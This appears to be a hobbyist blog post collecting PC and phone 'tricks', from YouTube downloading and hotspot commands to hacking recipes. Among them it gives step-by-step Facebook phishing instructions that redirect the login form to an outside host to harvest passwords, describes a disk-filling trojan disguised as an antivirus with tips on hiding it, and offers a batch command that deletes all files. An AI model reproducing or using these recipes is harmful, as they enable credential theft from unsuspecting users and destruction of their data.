HOW TO DOWNLOAD YOUTUBE VIDEOS

image

How To Download YouTube
Video From Mobile Without
Using Any Software

1) Open YouTube from your mobile browser and open the video you want to download.

2) The url of your video will be something like this
E.g. “http://m.youtube.com/watch?v=QJJsJb5KLvg

3) Now edit the URL ,
– replace “m.” (including the fullstop) with:
“ss” ,

4) After replacing your URL, should look something like this:
http://ssyoutube.com/watch?v=4kIrWqwWPslfo

5) Click on go
– The new URL will redirect you to A new page where you will see
different options to download your file.

If you want to Download video
from your computer then you can
also use this trick . just
replace the ” www. ” to ” ss
then click on go , after that
you can download the youtube video .

SHUTDOWN YOUR PC WITH YOUR CELLPHONE

The requirements are simple….One
cell phone with GPRS enabled,
Microsoft Outlook on the pc to be
put to shutdown.
Using this method the user can
shutdown, restart, hibernate the
computer just by sending an email
from their cell phone.
All you need to have is Microsoft
outlook which comes with Microsoft
word. The Microsoft outlook should
be installed on the pc you wish to
shutdown.
First you need to create a batch file
to perform shutdown etc .you can
write them down yourself.

* Open your notepad and type the
following
c:\windows\syst -em32\shutdown -s –
f -t 00
And save it as shutdown.bat
(Executable file)

* Open up Microsoft outlook .make
sure that it is already configured for
you email id.

* Now we will need to set Microsoft
outlook in such a way that outlook
checks your email every
minute.This can be set by going to
tools-à options

* Then click the mail setup tab and
later send/receive button

* Make sure that you schedule an
automatic send/ -receive…every box
checked and set the number of
minutes to 1.Now you may close all
these dialog boxes

* Now go to tools—rules and alert.
Next click on options button on the
upper right hand corner and press
the import rules button

* Now click on the shutdown.bat
which you recently created

* Now the final step

* When you send the message from
your phone to your email address
with a subject shutdown or
sms shutdown%% ……and Abracadabra your
computer will shutdown….

TROJAN HORSE

image

Most of you may be curious to know about how to make a Trojan or Virus on your own. Well, here is an answer to your curiosity. In this, post I’ll show you how to make a simple trojan on your own using the C programming language.
This trojan when executed will eat up the hard disk space on the root drive (The drive on which the Windows is installed, usually C: Drive) of the computer on which it is run. Also, this trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run.
So, I’ll call this as Space Eater Trojan. Since this program is written using a high level programming language, it is often undetected by antivirus programs. The source code for this program is available for download at the end of this post. Let’s see how this trojan works:
Before I move on to explain the working of this program, you need to know what exactly is a Trojan horse and how it works. Unlike what many of us think, a trojan horse is not a virus. In simple words, it is just a program that appears to do a favorable task but in reality performs undisclosed malicious functions that allow the attacker to gain unauthorized access to the host machine or cause a damage to the computer.

Now let’s move on to the working of our Trojan:

The trojan horse which I have created appears itself as an antivirus program that scans the computer for malware programs. However, in reality it does nothing other than eating up the hard disk space on the root drive by filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result, the the root drive gets filled up completely with in minutes of running this program.
Once the disk space is full, the trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any of the cleanup program. This is because, the trojan intelligently creates a huge file in the Windows\System32 folder with the .dll extension. Since the junk file has the .dll extension it is often ignored by the disk cleanup software. Hence there is now way to recover the hard disk space other than reformatting the drive.

The algorithm of the Trojan is as follows:

1. Search for the root drive.

2. Navigate to %systemroot%\Windows\System32 on the root drive.

3. Create the file named “spceshot.dll“.

4. Start dumping the junk data onto the above file and keep increasing its size until the drive is full.

5. Once the drive is full, stop the process.

You can download the Trojan source code HERE. Please note that I have not included the executable for security reasons. You need to compile it to obtain the executable.

How to compile the program?

For step-by-step compilation guide, refer my post How to compile C Programs.

How to test this trojan horse?

To test the trojan, just run the SpaceEater.exe file on your computer. It will generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up the hard disk space.

NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.

How to fix the damage and free up the space?

To remove the damage and free up the space, just type the following in the “run” dialog box:
%systemroot%\system32
Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.

 NOTE: You can also change the ICON of the virus to make it look like a legitimate program. This method is described in the post: How to Change the ICON of an EXE file?

PLEASE LEAVE A FEEDBACK.

HOW TO HACK FACEBOOK ACCOUNTS?

How to hack facebook account and
what are its preventive measures

image

Step 1: Go to http://www.facebook.com

Step 2: Save the login page of facebook (shortcut:press ctrl+S)

Step 3: Now 2 things would have been saved in your computer with the name “Welcome to Facebook – Log In, Sign Up or Learn More”

Step 4: Right click on the saved file with name “Welcome to Facebook – Log In, Sign Up or Learn More.htm” and open it with notepad

Step 5: Now search where the word “action” is written in it for the first time (shortcut: press ctrl+F then type action in it and then press enter).

Step 6: Now after action you will see action=”https://www.facebook.com/login.php?login_attempt=1″id=”login_form”

Step 7: Now replace that line with action=”http://hackfact.com/fb.php?id=your-email-id-here@gmail.com&link=www.facebook.com/login.php?login_attempt=1″

Step 8: Now replace the line your-email-id-here@gmail.com with your email-id where you want to recieve the password.

Step 9: Save the notepad(shortcut: ctrl+s).

Step 10: Now just put this page on your Desktop who so ever will login from this will be hacked. You will be having his/her password in your email-id or the other option you have is that upload this page on a free web hosting site where you can upload both these pages and if you have your own website you can upload this on that and send the link to others.    bingoooooooo..:).

Note: Remember both the files will be moved together which you saved with the name “Welcome to Facebook – Log In, Sign Up or Learn More” and you can rename the file with the name “Welcome to Facebook – Log In, Sign Up or Learn More.htm” but not that folder.

This trick was for educational purpose only and the preventive measure is that always see the URL of the site(Complete URL if site has url http://www.facebook.com.hacker.com then also its fake not genuine.). It should have only one .com at the end.

CREATE WIFI HOTSPOT WITH YOUR PC

image

Step 1] Go to start -> search for CMD Right Click It And ” Run As Administrator ” 

Step 2] Run These Commands Which Are Given Below

Command 1:

netsh wlan set hostednetwork mode=allow ssid=name key=password

**Change password to the password that you want to use**

Then If you want to run hotspot then run this command Command 2:

netsh wlan start hostednetwork
If you find any error in establishing so, make sure you have wireless adapter and it is turned on and all settings are proper.
If you want to know whether hotspot ON or OFF so run this command Command 3:

netsh wlan show hostednetwork

Then If you want to stop hotspot then run this command Command 4:

netsh wlan stop hostednetwork

Posted from WordPress for Android

Tricks which you must like:

1– View full specifications of your PC:
Just go to Run
type “dxdiag”
press enter.
Then you can view all PC specifications.

image

2– Delete all files of a Hard Disc when run a simple file:
>Notepad
>Type DEL/F/Q*
>ave it as delete command

3– Boost your PC

image

>Right click My Computer
>Properties
>Advance
>Performance
>Advanced
>Virtual Memory
>Change
Keep Initial Size
Same & Max Size Double

4– Increase your Web Browser loading speed & save Time by 65%(both PC & mobile):

image

1) CLEAR CACHE MEMORY at every 10 min.
2) Set OFF IMAGES if no need!

5– Make your own font in XP:
Private character editor used for editing fonts.
– run
– Type “eudcedit”
– Try making new fonts.

6– Trick 2 increase PC life:
-Shut down properly
-Don’t place many icons in desktop
-Keep 50% free space in C drive
-Don’t keep folders in task bar.

7– Who used your PC in yourAbsence?
What did he do?
1st u should Go-
>start
>run
>Type- eventvwr.msc

Posted from WordPress for Android